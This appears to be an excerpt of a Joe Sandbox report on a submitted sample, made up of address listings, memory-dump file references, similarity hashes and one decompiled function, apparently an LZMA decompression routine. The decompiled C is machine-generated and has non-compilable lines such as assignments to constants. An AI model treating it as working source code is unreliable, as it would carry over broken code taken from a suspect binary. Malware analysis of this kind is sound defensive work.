                                                                                                                0x004066f5
                                                                                                                0x00000000
                                                                                                                0x004066f5
                                                                                                                0x004066f3
                                                                                                                0x00406606
                                                                                                                0x00406609
                                                                                                                0x0040660b
                                                                                                                0x0040660e
                                                                                                                0x00406611
                                                                                                                0x00406614
                                                                                                                0x00406616
                                                                                                                0x00406619
                                                                                                                0x0040661c
                                                                                                                0x0040661c
                                                                                                                0x0040661f
                                                                                                                0x0040661f
                                                                                                                0x00406622
                                                                                                                0x00406629
                                                                                                                0x004065fd
                                                                                                                0x004065fd
                                                                                                                0x004065fd
                                                                                                                0x004065fd
                                                                                                                0x00000000
                                                                                                                0x0040662b
                                                                                                                0x00000000
                                                                                                                0x0040662b
                                                                                                                0x00406629
                                                                                                                0x004065af
                                                                                                                0x004065b2
                                                                                                                0x004065b4
                                                                                                                0x004065b7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406316
                                                                                                                0x00406316
                                                                                                                0x0040631a
                                                                                                                0x0040695f
                                                                                                                0x00000000
                                                                                                                0x0040695f
                                                                                                                0x00406320
                                                                                                                0x00406323
                                                                                                                0x00406326
                                                                                                                0x00406329
                                                                                                                0x0040632c
                                                                                                                0x0040632f
                                                                                                                0x00406332
                                                                                                                0x00406334
                                                                                                                0x00406337
                                                                                                                0x0040633a
                                                                                                                0x0040633d
                                                                                                                0x0040633f
                                                                                                                0x0040633f
                                                                                                                0x0040633f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040671e
                                                                                                                0x0040671e
                                                                                                                0x0040671e
                                                                                                                0x00406722
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406728
                                                                                                                0x0040672b
                                                                                                                0x0040672e
                                                                                                                0x00406731
                                                                                                                0x00406733
                                                                                                                0x00406733
                                                                                                                0x00406733
                                                                                                                0x00406736
                                                                                                                0x00406739
                                                                                                                0x0040673c
                                                                                                                0x0040673f
                                                                                                                0x00406742
                                                                                                                0x00406745
                                                                                                                0x00406746
                                                                                                                0x00406748
                                                                                                                0x00406748
                                                                                                                0x00406748
                                                                                                                0x0040674b
                                                                                                                0x0040674e
                                                                                                                0x00406751
                                                                                                                0x00406754
                                                                                                                0x00406757
                                                                                                                0x0040675b
                                                                                                                0x0040675d
                                                                                                                0x00406760
                                                                                                                0x00000000
                                                                                                                0x00406762
                                                                                                                0x00000000
                                                                                                                0x00406762
                                                                                                                0x00406760
                                                                                                                0x00406995
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fc4

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                                                • Instruction ID: e06b97397237a54a8f7c6fae7a0c48c933f493286525731b7b3672fa0d973436
                                                                                                                • Opcode Fuzzy Hash: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                                                • Instruction Fuzzy Hash: 678155B1D00229CFDF24CFA8C8447ADBBB1FB44305F25816AD456BB281D7789A96CF54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405F82, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E00405F82(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004069D4))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                                                0x00405f92
                                                                                                                0x00405f99
                                                                                                                0x00405f9f
                                                                                                                0x00405fa5
                                                                                                                0x00000000
                                                                                                                0x00405fa9
                                                                                                                0x00405fb5
                                                                                                                0x00405fb5
                                                                                                                0x00405fb5
                                                                                                                0x00405fbe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fc4
                                                                                                                0x00000000
                                                                                                                0x00405fcb
                                                                                                                0x00405fcf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fd8
                                                                                                                0x00405fdb
                                                                                                                0x00405fde
                                                                                                                0x00405fe0
                                                                                                                0x00405fe2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fe8
                                                                                                                0x00405feb
                                                                                                                0x00405fed
                                                                                                                0x00405fee
                                                                                                                0x00405ff1
                                                                                                                0x00405ff3
                                                                                                                0x00405ff4
                                                                                                                0x00405ff6
                                                                                                                0x00405ff9
                                                                                                                0x00405ffe
                                                                                                                0x00406003
                                                                                                                0x0040600c
                                                                                                                0x0040601f
                                                                                                                0x00406022
                                                                                                                0x0040602b
                                                                                                                0x0040602e
                                                                                                                0x00406056
                                                                                                                0x00406056
                                                                                                                0x00406058
                                                                                                                0x00406066
                                                                                                                0x00406066
                                                                                                                0x0040606a
                                                                                                                0x00000000
                                                                                                                0x00000000
